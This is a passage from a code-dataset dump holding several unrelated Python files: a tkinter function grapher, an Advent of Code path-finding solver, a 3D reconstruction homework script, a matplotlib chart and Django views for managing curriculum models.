frame.winfo_children():\n widget.destroy()\n\n fx = tk.Label(frame, text = \"f\" + str(self.id + 1) + \"(x) = \", font = \"Times 12\", bg = \"white\")\n fx.grid(column = 0, row = 0)\n\n entry1 = tk.Entry(frame, width = 4, textvariable = self.a_text)\n entry1.grid(column = 1, row = 0)\n\n x1_label = tk.Label(frame, text = \"√(\", font = \"Times 10\", bg = \"white\")\n x1_label.grid(column = 2, row = 0)\n\n entry2 = tk.Entry(frame, width = 4, textvariable = self.b_text)\n entry2.grid(column = 3, row = 0)\n\n x2_label = tk.Label(frame, text = \"x - \", font = \"Times 10\", bg = \"white\")\n x2_label.grid(column = 4, row = 0)\n\n entry3 = tk.Entry(frame, width = 4, textvariable = self.c_text)\n entry3.grid(column = 5, row = 0)\n\n x3_label = tk.Label(frame, text = \") - \", font = \"Times 10\", bg = \"white\")\n x3_label.grid(column = 6, row = 0)\n\n entry4 = tk.Entry(frame, width = 4, textvariable = self.d_text)\n entry4.grid(column = 7, row = 0)\n\n def xtox(self, frame):\n for widget in frame.winfo_children():\n widget.destroy()\n\n fx = tk.Label(frame, text = \"f\" + str(self.id + 1) + \"(x) = \", font = \"Times 12\", bg = \"white\")\n fx.grid(column = 0, row = 0)\n\n entry1 = tk.Entry(frame, width = 4, textvariable = self.a_text)\n entry1.grid(column = 1, row = 0)\n\n x1_label = tk.Label(frame, text = \"x^(\", font = \"Times 10\", bg = \"white\")\n x1_label.grid(column = 2, row = 0)\n\n entry2 = tk.Entry(frame, width = 4, textvariable = self.b_text)\n entry2.grid(column = 3, row = 0)\n\n x2_label = tk.Label(frame, text = \"x - \", font = \"Times 10\", bg = \"white\")\n x2_label.grid(column = 4, row = 0)\n\n entry3 = tk.Entry(frame, width = 4, textvariable = self.c_text)\n entry3.grid(column = 5, row = 0)\n\n x3_label = tk.Label(frame, text = \") - \", font = \"Times 10\", bg = \"white\")\n x3_label.grid(column = 6, row = 0)\n\n entry4 = tk.Entry(frame, width = 4, textvariable = self.d_text)\n entry4.grid(column = 7, row = 0)\n\n def delete(self):\n self.functions.destroy()\n self.window.delete_line(self.line, self.id)\n self.window.functions_id -= 1\n\n def entry_callback(self, event1, event2, event3):\n try:\n self.a = float(self.a_text.get())\n except ValueError:\n if self.a_text.get() == \"-\":\n self.a = 0\n self.a_text.set(\"-\")\n if \"/\" in self.a_text.get():\n self.a = float(eval(self.a_text.get()))\n else:\n self.a = 0\n self.a_text.set(\"\")\n try:\n self.b = float(self.b_text.get())\n except ValueError:\n if self.b_text.get() == \"-\":\n self.b = 0\n self.b_text.set(\"-\")\n if \"/\" in self.b_text.get():\n self.b = float(eval(self.a_text.get()))\n else:\n self.b = 0\n self.b_text.set(\"\")\n try:\n self.c = float(self.c_text.get())\n except ValueError:\n if self.c_text.get() == \"-\":\n self.c = 0\n self.c_text.set(\"-\")\n if \"/\" in self.c_text.get():\n self.c = float(eval(self.a_text.get()))\n else:\n self.c = 0\n self.c_text.set(\"\")\n try:\n self.d = float(self.d_text.get())\n except ValueError:\n if self.d_text.get() == \"-\":\n self.d = 0\n self.d_text.set(\"-\")\n if \"/\" in self.d_text.get():\n self.d = float(eval(self.a_text.get()))\n else:\n self.d = 0\n self.d_text.set(\"\")\n self.update_line()\n\n def __init__(self, GraphWindow, frame, root, id):\n self.window = GraphWindow\n print(\"ID in __init__: \", id)\n self.id = id\n self.a = random.randint(-5, 5)\n self.b = random.randint(1, 10)\n self.c = random.randint(1, 10)\n self.d = random.randint(1, 10)\n self.a_text = StringVar(root)\n self.b_text = StringVar(root)\n self.c_text = StringVar(root)\n self.d_text = StringVar(root)\n self.a_text.set(self.a)\n self.b_text.set(self.b)\n self.c_text.set(self.c)\n self.d_text.set(self.d)\n self.degree = StringVar(root)\n # colors = [\"blue\", \"yellow\", \"black\", \"purple\", \"red\", \"green\"]\n self.functions = tk.Frame(frame, bg = \"white\", highlightbackground = 'black', highlightcolor = \"black\",\n highlightthickness = 1) # bg=random.choice(colors))\n self.functions.pack(side = 'top', pady = 1, padx = 10)\n self.function = tk.Frame(self.functions, bg = \"white\") # bg='yellow')\n self.function.pack(side = 'left', padx = 40, pady = 10)\n\n options_list = [\"First degree\", \"Second degree\", \"Third degree\", \"Logarithm\", \"sin(x)\", \"cos(x)\", \"tan(x)\",\n \"arcsin(x)\", \"arccos(x)\", \"arctan(x)\", \"√(x)\", \"x\\u207F\"]\n options = ttk.OptionMenu(self.functions, self.degree, options_list[0], *options_list, command = self.drop_down)\n options.pack(side = 'right', padx = 50)\n self.drop_down(options_list[0], firsttime = True)\n\n delete_button = ttk.Button(self.functions, text = 'Delete', command = lambda: self.delete())\n delete_button.pack(side = 'right')\n\n self.a_text.trace_add(\"write\", self.entry_callback)\n self.b_text.trace_add(\"write\", self.entry_callback)\n self.c_text.trace_add(\"write\", self.entry_callback)\n self.d_text.trace_add(\"write\", self.entry_callback)\n\n\nclass GraphWindow(Graph, FunctionBar):\n\n def new_function(self):\n if self.functions_id > 13:\n pass\n else:\n self.functions_id += 1\n temp = FunctionBar(self, self.functions_frame, self.root, self.functions_id)\n Graph.add_line(self, temp, self.ax, self.functions_id)\n\n def create_widgets(self):\n window_frame = tk.Frame(self.root, bg = \"white\")\n window_frame.pack(expand = True, fill = 'both')\n\n top_label = tk.Label(window_frame, font = \"Times 20\", text = \"Graph your functions here!\", bg = \"white\")\n top_label.pack()\n\n frame = tk.Frame(window_frame, bg = 'white')\n frame.pack(expand = True, fill = 'y')\n\n self.functions_frame = tk.Canvas(frame, bg = \"white\", highlightbackground = 'white', highlightcolor = \"white\")\n self.functions_frame.pack(side = \"left\", expand = True, fill = 'both')\n help(self.functions_frame.create_window)\n self.functions_frame.create_window(0, 0)\n\n add_button = ttk.Button(frame, text = 'Add function', command = lambda: self.new_function())\n add_button.pack(anchor = 'ne', side = 'right', padx = 10)\n\n def update(self, val):\n x_pos = self.s_time_x.val\n y_pos = self.s_time_y.val\n self.ax.axis([x_pos - 10, x_pos + 10, y_pos - 10, y_pos + 10])\n self.f.canvas.draw_idle()\n\n def __init__(self):\n self.root = tk.Tk()\n self.root.title(\"Function Graphing\")\n self.root.config(bg = \"white\")\n self.root.geometry(\"1600x800\")\n self.f = Figure(figsize = (8, 8), dpi = 100)\n self.ax = self.f.add_subplot(1, 1, 1)\n super().__init__(self.f, self.root)\n\n self.ax.spines['left'].set_position('zero')\n self.ax.spines['bottom'].set_position('zero')\n self.ax.spines['top'].set_color('none')\n self.ax.spines['right'].set_color('none')\n major_ticks = numpy.arange(-110, 110, 1)\n minor_ticks = numpy.arange(-110, 110, 0.5)\n self.ax.set_xticks(major_ticks)\n self.ax.set_xticks(minor_ticks, minor = True)\n self.ax.set_yticks(major_ticks)\n self.ax.set_yticks(minor_ticks, minor = True)\n self.ax.grid(which = 'both')\n self.ax.set_ylim((-10, 10))\n self.x_lim = 10\n self.ax.set_xlim(- self.x_lim, self.x_lim)\n\n self.ax_x = self.f.add_axes([0.12, 0.070, 0.78, 0.03])\n self.ax_y = self.f.add_axes([0.12, 0.015, 0.78, 0.03])\n self.s_time_x = Slider(self.ax_x, 'X value', -10, 10, valinit = 0)\n self.s_time_y = Slider(self.ax_y, 'Y value', -10, 10, valinit = 0)\n\n self.s_time_x.on_changed(self.update)\n self.s_time_y.on_changed(self.update)\n\n self.functions_id = -1\n self.function_list = []\n self.create_widgets()\n\n self.new_function()\n # self.root.bind(\"\", self.print_wh)\n self.root.mainloop()\n\n\nif __name__ == \"__main__\":\n GraphWindow()\n","sub_path":"fuction_drawer/function_drawer.py","file_name":"function_drawer.py","file_ext":"py","file_size_in_byte":24165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"49220732","text":"\"\"\"day 24 part 1\"\"\"\nimport time\nfrom collections import namedtuple\nfrom itertools import combinations, permutations\n\nLocation = namedtuple('Location', ['x', 'y', 'n'])\n\n\ndef parse_puzzle(p):\n \"\"\"parse the puzzle\"\"\"\n nums = {}\n blocked = set()\n\n for i, line in enumerate(p):\n for j, l in enumerate(line):\n if l == '#':\n blocked.add((i, j))\n elif l != '.':\n nums[int(l)] = (i, j)\n\n return nums, blocked\n\n\nclass Puzzle():\n \"\"\"Puzzle class\"\"\"\n\n def __init__(self, inpt):\n self.nums, self.blocked = parse_puzzle(inpt)\n self.shape = (len(inpt[0]), len(inpt))\n\n def solve(self):\n \"\"\"main solve method\"\"\"\n\n # find all min dists\n dists = {}\n for s, e in combinations(self.nums.keys(), 2):\n dist = self.find_dist(self.nums[s], self.nums[e])\n dists[(s, e)] = dist\n dists[(e, s)] = dist\n\n # find min covering path\n start = time.time()\n res = self.brute_force(dists)\n print(f'Brute Force: {time.time() - start}')\n print(res)\n\n start = time.time()\n res = self.min_covering(dists)\n print(f'Algo: {time.time() - start}')\n print(res)\n\n return res\n\n def find_dist(self, start, end):\n \"\"\"find the minimum distance between two points\"\"\"\n queue = [Location(start[0], start[1], 0)]\n visited = {start}\n # breadth first search\n while queue:\n loc = queue.pop(0)\n\n # try all 4 directions\n for new_loc in [(loc.x + 1, loc.y), (loc.x - 1, loc.y),\n (loc.x, loc.y + 1), (loc.x, loc.y - 1)]:\n\n # make sure we haven't been there or it's blocked\n if new_loc not in self.blocked and new_loc not in visited:\n # if at the end then return\n if new_loc == end:\n return loc.n + 1\n # add to list and visited\n queue.append(Location(new_loc[0], new_loc[1], loc.n + 1))\n visited.add(new_loc)\n\n raise ValueError\n\n def brute_force(self, dists):\n \"\"\"brute force method\"\"\"\n vals = list(self.nums.keys())\n vals.remove(0)\n best = 100000\n order = None\n for p in permutations(vals):\n tot = dists[(0, p[0])]\n for i, v in enumerate(p[1:]):\n tot += dists[(p[i], v)]\n # add on the ending at 0\n tot += dists[(p[-1], 0)]\n\n if tot < best:\n best = tot\n order = p\n\n print([0] + list(order) + [0])\n return best\n\n def min_covering(self, dists):\n \"\"\"run TSP algo\"\"\"\n vals = list(self.nums.keys())\n vals.remove(0)\n c = {}\n for v in vals:\n c[((v, ), v)] = dists[(0, v)]\n\n for s in range(2, len(vals) + 1):\n for p in permutations(vals, s):\n for v in p:\n sub_p = list(p)\n sub_p.remove(v)\n sub_p = tuple(sub_p)\n c[(p, v)] = min(\n [c[(sub_p, m)] + dists[(m, v)] for m in sub_p])\n\n return min([\n v + dists[(k[1], 0)] for k, v in c.items()\n if len(k[0]) == len(vals)\n ])\n\n\nif __name__ == '__main__':\n test = \"\"\"###########\n#0.1.....2#\n#.#######.#\n#4.......3#\n###########\"\"\"\n print(Puzzle(test.split('\\n')).solve())\n print(Puzzle(open('24_input').read().split('\\n')).solve())\n","sub_path":"2016/24_02.py","file_name":"24_02.py","file_ext":"py","file_size_in_byte":3569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"67444716","text":"import numpy as np\nimport cv2\nimport scipy.io\nimport matplotlib.pyplot as plt\nfrom matplotlib.lines import Line2D\nfrom my_functions import *\n#from mpl_toolkits.mplot3d import Axes3D\n#from IPython import embed\n\n# \"\"\"\n# Homework 2: 3D reconstruction from two Views\n# This function takes as input the name of the image pairs (i.e. 'house' or\n# 'library') and returns the 3D points as well as the camera matrices...but\n# some functions are missing.\n# NOTES\n# (1) The code has been written so that it can be easily understood. It has \n# not been written for efficiency.\n# (2) Don't make changes to this main function since I will run my\n# reconstruct_3d.m and not yours. I only want from you the missing\n# functions and they should be able to run without crashing with my\n# reconstruct_3d.m\n# (3) Keep the names of the missing functions as they are defined here,\n# otherwise things will crash\n# \"\"\"\n\nVISUALIZE = False\n\ndef reconstruct_3d(name):\n\t# ------- Load images, K matrices and matches -----\n\tdata_dir = \"../data/{}\".format(name)\n\n\t# images\n\tI1 = cv2.imread(f\"{data_dir}/{name}1.jpg\")\n\tI2 = cv2.imread(f\"{data_dir}/{name}2.jpg\")\n\t# of shape (H,W,C)\n\n\t# K matrices\n\tK1 = scipy.io.loadmat(f\"{data_dir}/{name}1_K.mat\")[\"K\"]\n\tK2 = scipy.io.loadmat(f\"{data_dir}/{name}2_K.mat\")[\"K\"]\n\n\t# corresponding points\n\tlines = open(f\"{data_dir}/{name}_matches.txt\").readlines()\n\tmatches = np.array([list(map(float, line.split())) for line in lines])\n\n\t# this is a N x 4 where:\n\t# matches(i,1:2) is a point (w,h) in the first image\n\t# matches(i,3:4) is the corresponding point in the second image\n\n\tif VISUALIZE:\n\t\tfig = plt.figure()\n\t\tax = fig.add_subplot(111)\n\t\tplt.imshow(np.concatenate([I1, I2], axis=1))\n\t\tplt.plot(matches[:, 0], matches[:, 1], \"+r\")\n\t\tplt.plot(matches[:, 2] + I1.shape[1], matches[:, 3], \"+r\")\n\t\tfor i in range(matches.shape[0]):\n\t\t\tline = Line2D([matches[i, 0], matches[i, 2] + I1.shape[1]], [matches[i, 1], matches[i, 3]], linewidth=1,\n\t\t\t\t\t\t color=\"r\")\n\t\t\t#ax.add_line(line)\n\t\tplt.savefig(f\"{data_dir}/{name}_matches.jpg\")\n\t\t#plt.show()\n\n\t## -------------------------------------------------------------------------\n\t## --------- Find fundamental matrix --------------------------------------\n\n\t# F : the 3x3 fundamental matrix,\n\t# res_err : mean squared distance between points in the two images and their\n\t# their corresponding epipolar lines\n\n\t(F, res_err) = fundamental_matrix(matches) # <------------------------------------- You write this one!\n\tprint(f\"Residual in F = {res_err}\")\n\tprint('the fundamental matrix F is {}'.format(F))\n\tE = K2.T @ F @ K1\n\n\t## -------------------------------------------------------------------------\n\t## ---------- Rotation and translation of camera 2 ------------------------\n\n\t# R : cell array with the possible rotation matrices of second camera\n\t# t : cell array of the possible translation vectors of second camera\n\t(R, t) = find_rotation_translation(E) # <------------------------------------- You write this one!\n\n\tprint(t)\n\tprint(R)\n\n\n\t# Find R2 and t2 from R,t such that largest number of points lie in front\n\t# of the image planes of the two cameras\n\tP1 = K1 @ np.concatenate([np.identity(3), np.zeros((3, 1))], axis=1)\n\n\t# the number of points in front of the image planes for all combinations\n\tnum_points = np.zeros([len(t), len(R)])\n\terrs = np.full([len(t), len(R)], np.inf)\n\n\tfor ti in range(len(t)):\n\t\tt2 = t[ti]\n\t\tfor ri in range(len(R)):\n\t\t\tR2 = R[ri]\n\t\t\tP2 = K2 @ np.concatenate([R2, t2[:, np.newaxis]], axis=1)\n\t\t\t(points_3d, errs[ti,ri]) = find_3d_points(P1, P2, matches) #<---------------------- You write this one!\n\t\t\tZ1 = points_3d[:,2]\n\t\t\tZ2 = (points_3d @ R2[2,:].T + t2[2])\n\t\t\tnum_points[ti,ri] = np.sum(np.logical_and(Z1>0,Z2>0))\n\t(ti,ri) = np.where(num_points==np.max(num_points))\n\tj = 0 # pick one out the best combinations\n\tprint(f\"Reconstruction error = {errs[ti[j],ri[j]]}\")\n\n\tt2 = t[ti[j]]\n\tR2 = R[ri[j]]\n\n\t# print(num_points)\n\t# print(errs)\n\t# print(t2)\n\t# print(R2)\n\n\tP2 = K2 @ np.concatenate([R2, t2[:, np.newaxis]], axis=1)\n\n\t# % compute the 3D points with the final P2\n\tpoints, _, matches_hat = find_3d_points(P1, P2, matches, True) # <---------------------------------------------- You have already written this one!\n\n\t## -------- plot points and centers of cameras ----------------------------\n\n\tplot_3d(points, t2, R2) #<-------------------------------------------------------------- You write this one!\n\t#visualize_matches(I1, I2, matches_hat)\n\nif __name__ == \"__main__\":\n\treconstruct_3d('library')","sub_path":"hw3_package/starter_code/code/reconstruct_3d.py","file_name":"reconstruct_3d.py","file_ext":"py","file_size_in_byte":4499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"409338128","text":"import matplotlib.pyplot as plt\nimport matplotlib\nfrom matplotlib.ticker import MultipleLocator\nimport numpy as np\n\ny = [92.6, 87.8, 82.6, 73.0, 70.4]\ny2 = [87.2, 93.3, 85, 77.9, 80]\nx = [1, 2, 3, 4, 5]\n\nplt.rcParams[\"font.family\"] = \"Times New Roman\"\n\nfig, axes = plt.subplots(1, 1, figsize=(8, 4))\n# 折线图\naxes.plot(x, y, linestyle='-', color='#DE6B58', marker='x', linewidth=1.5)\naxes.plot(x, y2, linestyle='-', color='#E1A084', marker='x', linewidth=1.5)\n# 设置最小刻度间隔\naxes.yaxis.set_minor_locator(MultipleLocator(2.5))\naxes.xaxis.set_minor_locator(MultipleLocator(0.5))\n# 画网格线\naxes.grid(which='minor', c='lightgrey')\n# 设置x、y轴标签\naxes.set_ylabel(\"Generation Consistency\")\naxes.set_xlabel(\"KB Row Number\")\n# 设置y轴的刻度\naxes.set_yticks([70, 75, 80, 85, 90, 95])\n# 对每个数据点加标注\nfor x_, y_ in zip(x, y):\n axes.text(x_, y_, y_, ha='left', va='bottom')\nfor x_, y_ in zip(x, y2):\n axes.text(x_, y_, y_, ha='left', va='bottom')\n# 展示图片\nplt.show()\nfig.savefig(\"折线图.png\", dpi=800)\n","sub_path":"part1:折线图、柱状图、饼图/代码/折线图.py","file_name":"折线图.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"295237296","text":"from django.shortcuts import render\nfrom home.models import Etudiant, ModeleFormation, ModeleSemestre, ModeleUE, ModeleModule, SemestrePossible, SemestreAnnualise, Association_Etudiant_SemestreAnnualise, MoyenneSemestre, BAC, MentionBACPossible, TypeBAC, TypeCursus, CursusPossible, CursusPreDUT, CursusPostDUT\nfrom home.forms import ModuleForm, UEForm, SemestreForm, ModeleForm, BACForm, CursusForm\n\n# Create your views here.\ndef homeFormation(request):\n\treturn homeFormationMessage(request, False)\n\ndef homeFormationMessage(request, messageAAfficher):\n\t# liste de tout les modeles\n\tmodelesCursusDUT = ModeleFormation.objects.all().order_by('-id')\n\t\n\t# on détermine quel sont les models supprimable\n\tmodelesNonSupprimable = set()\n\tsemestresAnnu = SemestreAnnualise.objects.all()\n\t\n\tfor sem in semestresAnnu:\n\t\tmodelesNonSupprimable.add(sem.modeleFormation)\n\t\n\tform = ModeleForm()\n\t\n\t# on affiche\n\treturn render(request, 'enseignementManager/ModelesOnglets.html', locals())\n\t\ndef creerTreeViewModeleFormation(request):\n\t\n\tform = ModeleForm(request.POST)\n\t\n\tif form.is_valid():\n\t\t\n\t\ttry:\n\t\t\tmodeleExistant = ModeleFormation.objects.get(nom=request.POST['nom'])\n\t\t\t\n\t\t\t# Erreur, nom de modèle déjà existant.\n\t\t\ttitreErreur = 'Erreur de création du modèle.'\n\t\t\tmessageErreur = 'Le nom du modèle doit être unique.'\n\t\t\tdetailsErreur = []\n\t\t\tdetailsErreur.append('Il existe déjà un modèle nommé : \\'' + request.POST['nom'] + '\\'')\n\t\t\t\n\t\t\treturn render(request, 'erreurUtilisateur.html', locals())\n\t\t\t\n\t\texcept ModeleFormation.DoesNotExist:\n\t\t\t\n\t\t\t# le cursus n'existe pas, on peut le rajouter\n\t\t\tmodele = form.save()\n\t\t\t\n\t\t\t#on crée une structure minimale pour le cursus avec au moins les 4 semestres\n\t\t\t\n\t\t\tModeleSemestre(intitule='Semestre 1', typeSemestre=SemestrePossible.objects.get(semestre='S1'), modeleFormation=modele).save()\n\t\t\tModeleSemestre(intitule='Semestre 2', typeSemestre=SemestrePossible.objects.get(semestre='S2'), modeleFormation=modele).save()\n\t\t\tModeleSemestre(intitule='Semestre 3', typeSemestre=SemestrePossible.objects.get(semestre='S3'), modeleFormation=modele).save()\n\t\t\tModeleSemestre(intitule='Semestre 4', typeSemestre=SemestrePossible.objects.get(semestre='S4'), modeleFormation=modele).save()\n\t\t\t\n\t\t\tsemestres = ModeleSemestre.objects.filter(modeleFormation=modele).order_by('typeSemestre')\n\t\t\t\n\t\t\tsemestresNonSupprimableEtudiant = []\n\t\t\t\n\t\t\t# on empeche de supprimer un semestre si il est le seul de ce type (il faut toujours au moins 4 semestres)\n\t\t\tsemestresNonSupprimableStructureMinimum = []\n\t\t\tfor semestre in semestres:\n\t\t\t\tlisteSem = ModeleSemestre.objects.filter(modeleFormation=semestre.modeleFormation, typeSemestre=semestre.typeSemestre)\n\t\t\t\tif len(listeSem) < 2:\n\t\t\t\t\tsemestresNonSupprimableStructureMinimum.append(semestre)\n\t\t\t\n\t\t\t# on détermine les semestres dont on peut modifier le structure (aucune moyenne relié à ce semestre)\n\t\t\tsemestresStructureNonAlterable = []\n\t\t\t\n\t\t\tUEs = []\n\t\t\tmodules = []\n\t\t\t\n\t\t\treturn render(request, 'enseignementManager/treeViewModeleFormation.html', locals())\n\t\ndef modifierTreeViewModeleFormation(request, idModele):\n\t\n\tmodele = ModeleFormation.objects.get(id=idModele)\n\t\n\t# les semestres qui font partie de ce modele\n\tsemestres = ModeleSemestre.objects.filter(modeleFormation=modele).order_by('typeSemestre')\n\t\n\t# on détermine les semestres qui sont supprimable (aucun étudiant n'y est inscrit)\n\tsemestresNonSupprimableEtudiant = []\n\tassocs = Association_Etudiant_SemestreAnnualise.objects.all()\n\tfor assoc in assocs:\n\t\tsemestresNonSupprimableEtudiant.append(assoc.modeleSemestre)\n\t\n\t# on empeche de supprimer un semestre si il est le seul de ce type (il faut toujours au moins 4 semestres)\n\tsemestresNonSupprimableStructureMinimum = []\n\tfor semestre in semestres:\n\t\tlisteSem = ModeleSemestre.objects.filter(modeleFormation=semestre.modeleFormation, typeSemestre=semestre.typeSemestre)\n\t\tif len(listeSem) < 2:\n\t\t\tsemestresNonSupprimableStructureMinimum.append(semestre)\n\t\n\t# on détermine les semestres dont on peut modifier le structure (aucune moyenne relié à ce semestre)\n\tsemestresStructureNonAlterable = []\n\tmoyennesSemestre = MoyenneSemestre.objects.all()\n\tfor moy in moyennesSemestre:\n\t\tsemestresStructureNonAlterable.append(moy.modeleSemestre)\n\t\n\t# les UEs qui font partie de ce modele\n\tUEs = []\n\t\n\tfor semestre in semestres:\n\t\tuesDuSemestre = ModeleUE.objects.filter(modeleSemestre=semestre)\n\t\tfor ue in uesDuSemestre:\n\t\t\tUEs.append(ue)\n\t\n\t# les modules qui font partie de ce modele\n\tmodules = []\n\t\n\tfor ue in UEs:\n\t\tmodulesDeUE = ModeleModule.objects.filter(modeleUE=ue)\n\t\tfor module in modulesDeUE:\n\t\t\tmodules.append(module)\n\t\n\treturn render(request, 'enseignementManager/treeViewModeleFormation.html', locals())\n\ndef supprimerModeleFormation(request, idModele):\n\t\n\ttry:\n\t\tmodele = ModeleFormation.objects.get(id=idModele)\n\texcept ModeleFormation.DoesNotExist:\n\t\ttitreErreur = 'Erreur de suppression du modèle de formation'\n\t\tmessageErreur = 'Le modèle de formation que vous souhaitez supprimer n\\'existe pas.'\n\t\tdetailsErreur = []\n\t\tpageRetour = '/gestionEnseignement/formation'\n\t\treturn render(request, 'erreurUtilisateur.html', locals())\n\t\n\tif request.method == 'POST' and 'formulaireDeConfirmation' in request.POST:\n\t\t\n\t\tmessageAAfficher = 'Le modèle ' + modele.nom + ' a bien été supprimé'\n\t\tmodele.delete()\n\t\treturn homeFormationMessage(request, messageAAfficher)\n\t\n\telse:\n\t\t\n\t\tactionUtilisateur = 'Supprimer le modèle de formation ' + modele.nom\n\t\tvaleursPOSTAConserver = []\n\t\tlienActionUtilisateur = '/gestionEnseignement/supprimerModeleFormation/' + idModele\n\t\treturn render(request, 'pageConfirmation.html', locals())\n\t\ndef paramModifierInformationsModeleFormation(request, idModele):\n\t\n\tmodele = ModeleFormation.objects.get(id=idModele)\n\tform = ModeleForm(instance=modele)\n\t\n\treturn render(request, 'enseignementManager/modifierInformationModeleFormation.html', locals())\n\t\ndef modifierInformationsModeleFormation(request):\n\t\n\tmodele = ModeleFormation.objects.get(id=request.POST['idModele'])\n\tform = ModeleForm(request.POST, instance=modele)\n\t\n\tif form.is_valid():\n\t\tform.save()\n\t\n\treturn modifierTreeViewModeleFormation(request, request.POST['idModele'])\n\ndef copierModeleFormation(request, idModele):\n\t\n\t# On récupère le modèle de formation à copier\n\ttry:\n\t\tmodeleFormationOriginal = ModeleFormation.objects.get(id=idModele)\n\texcept ModeleFormation.DoesNotExist:\n\t\ttitreErreur = 'Erreur de copie du modèle de formation'\n\t\tmessageErreur = 'Le modèle de formation que vous souhaitez copier n\\'existe pas.'\n\t\tdetailsErreur = []\n\t\tpageRetour = '/gestionEnseignement/formation'\n\t\treturn render(request, 'erreurUtilisateur.html', locals())\n\t\n\t# On crée le nouveau modèle de formation\n\t\n\t# 1) On cherche le premier nom de copie disponible\n\tnumCopie = 1\n\tmodeleExistant = ModeleFormation.objects.filter(nom=modeleFormationOriginal.nom + '_copie_' + str(numCopie))\n\twhile modeleExistant:\n\t\tnumCopie = numCopie + 1\n\t\tmodeleExistant = ModeleFormation.objects.filter(nom=modeleFormationOriginal.nom + '_copie_' + str(numCopie))\n\t\n\t# 2) On crée le modèle\n\tmodeleFormationCopie = ModeleFormation(nom=modeleFormationOriginal.nom + '_copie_' + str(numCopie), description=modeleFormationOriginal.description)\n\tmodeleFormationCopie.save()\n\t\n\t# On récupère la liste des modèles de semestre du modèle de formation à copier\n\tlisteModelesSemetresOrigine = ModeleSemestre.objects.filter(modeleFormation=modeleFormationOriginal)\n\t\n\t# pour chaque semestre du modèle d'origine\n\tfor modeleSemestreOrigine in listeModelesSemetresOrigine:\n\t\n\t\t# On crée une copie du semestre\n\t\tmodeleSemestreCopie = ModeleSemestre(intitule=modeleSemestreOrigine.intitule, modeleFormation=modeleFormationCopie, typeSemestre=modeleSemestreOrigine.typeSemestre)\n\t\tmodeleSemestreCopie.save()\n\t\t\n\t\t# On copie la sous arborescence du semestre\n\t\tlisteModelesUEsOrigine = ModeleUE.objects.filter(modeleSemestre=modeleSemestreOrigine)\n\t\tfor modeleUEOrigine in listeModelesUEsOrigine:\n\t\t\t\n\t\t\tmodeleUECopie = ModeleUE(code=modeleUEOrigine.code, intitule=modeleUEOrigine.intitule, coefficient=modeleUEOrigine.coefficient, modeleSemestre=modeleSemestreCopie)\n\t\t\tmodeleUECopie.save()\n\t\t\t\n\t\t\tlisteModelesModulesOrigine = ModeleModule.objects.filter(modeleUE=modeleUEOrigine)\n\t\t\tfor modeleModuleOrigine in listeModelesModulesOrigine:\n\t\t\t\t\n\t\t\t\tmodeleModuleCopie = ModeleModule(code=modeleModuleOrigine.code, intitule=modeleModuleOrigine.intitule, coefficient=modeleModuleOrigine.coefficient, modeleUE=modeleUECopie)\n\t\t\t\tmodeleModuleCopie.save()\n\t\n\treturn homeFormationMessage(request, 'Le modèle ' + modeleFormationOriginal.nom + ' a été copié sous le nom ' + modeleFormationCopie.nom)\n\t\ndef paramModifierSemestre(request, idModele, idSemestre):\n\t\n\tsemestre = ModeleSemestre.objects.get(id=idSemestre)\n\tform = SemestreForm(instance=semestre)\n\t\n\treturn render(request, 'enseignementManager/modifierSemestre.html', locals())\n\t\ndef modifierSemestre(request):\n\tsemestre = ModeleSemestre.objects.get(id=request.POST['idSemestre'])\n\tform = SemestreForm(request.POST, instance=semestre)\n\t\n\tif form.is_valid():\n\t\tform.save()\n\t\n\treturn modifierTreeViewModeleFormation(request, request.POST['idModele'])\n\t\ndef paramAjouterSemestre(request, idModele):\n\t\n\tmodele = ModeleFormation.objects.get(id=idModele)\n\tform = SemestreForm()\n\t\n\treturn render(request, 'enseignementManager/ajouterSemestre.html', locals())\n\t\ndef ajouterSemestre(request):\n\tprint(request.POST)\n\tform = SemestreForm(request.POST)\n\t\n\tif form.is_valid():\n\t\tsemestre = form.save(commit = False)\n\t\tsemestre.modeleFormation = ModeleFormation.objects.get(id=request.POST['idModele'])\n\t\tsemestre.typeSemestre = SemestrePossible.objects.get(semestre=request.POST['typeSemestre'])\n\t\tsemestre.save()\n\t\n\treturn modifierTreeViewModeleFormation(request, request.POST['idModele'])\n\t\ndef supprimerSemestre(request, idModele, idSemestre):\n\t\n\ttry:\n\t\tmodeleSemestre = ModeleSemestre.objects.get(id=idSemestre)\n\texcept ModeleSemestre.DoesNotExist:\n\t\ttitreErreur = 'Erreur de suppression du modèle de semestre'\n\t\tmessageErreur = 'Le modèle de semestre que vous souhaitez supprimer n\\'existe pas.'\n\t\tdetailsErreur = []\n\t\tpageRetour = '/gestionEnseignement/modifierTreeViewModeleFormation/' + idModele\n\t\treturn render(request, 'erreurUtilisateur.html', locals())\n\t\n\tif request.method == 'POST' and 'formulaireDeConfirmation' in request.POST:\n\t\n\t\tmodeleSemestre.delete()\n\t\treturn modifierTreeViewModeleFormation(request, idModele)\n\t\n\telse:\n\t\t\n\t\tactionUtilisateur = 'Supprimer le modèle de semestre ' + modeleSemestre.intitule\n\t\tvaleursPOSTAConserver = []\n\t\tlienActionUtilisateur = '/gestionEnseignement/supprimerSemestre/' + idModele + '/' + idSemestre\n\t\treturn render(request, 'pageConfirmation.html', locals())\n\t\ndef paramModifierUE(request, idModele, idUE):\n\t\n\tue = ModeleUE.objects.get(id=idUE)\n\tform = UEForm(instance=ue)\n\t\n\treturn render(request, 'enseignementManager/modifierUE.html', locals())\n\t\ndef modifierUE(request):\n\tue = ModeleUE.objects.get(id=request.POST['idUE'])\n\tform = UEForm(request.POST, instance=ue)\n\t\n\tif form.is_valid():\n\t\tform.save()\n\t\n\treturn modifierTreeViewModeleFormation(request, request.POST['idModele'])\n\t\ndef paramAjouterUE(request, idModele, idSemestre):\n\t\n\tsemestre = ModeleSemestre.objects.get(id=idSemestre)\n\tform = UEForm()\n\t\n\treturn render(request, 'enseignementManager/ajouterUE.html', locals())\n\t\ndef ajouterUE(request):\n\tform = UEForm(request.POST)\n\t\n\tif form.is_valid():\n\t\tue = form.save(commit = False)\n\t\tue.modeleSemestre = ModeleSemestre.objects.get(id=request.POST['idSemestre'])\n\t\tue.save()\n\t\n\treturn modifierTreeViewModeleFormation(request, 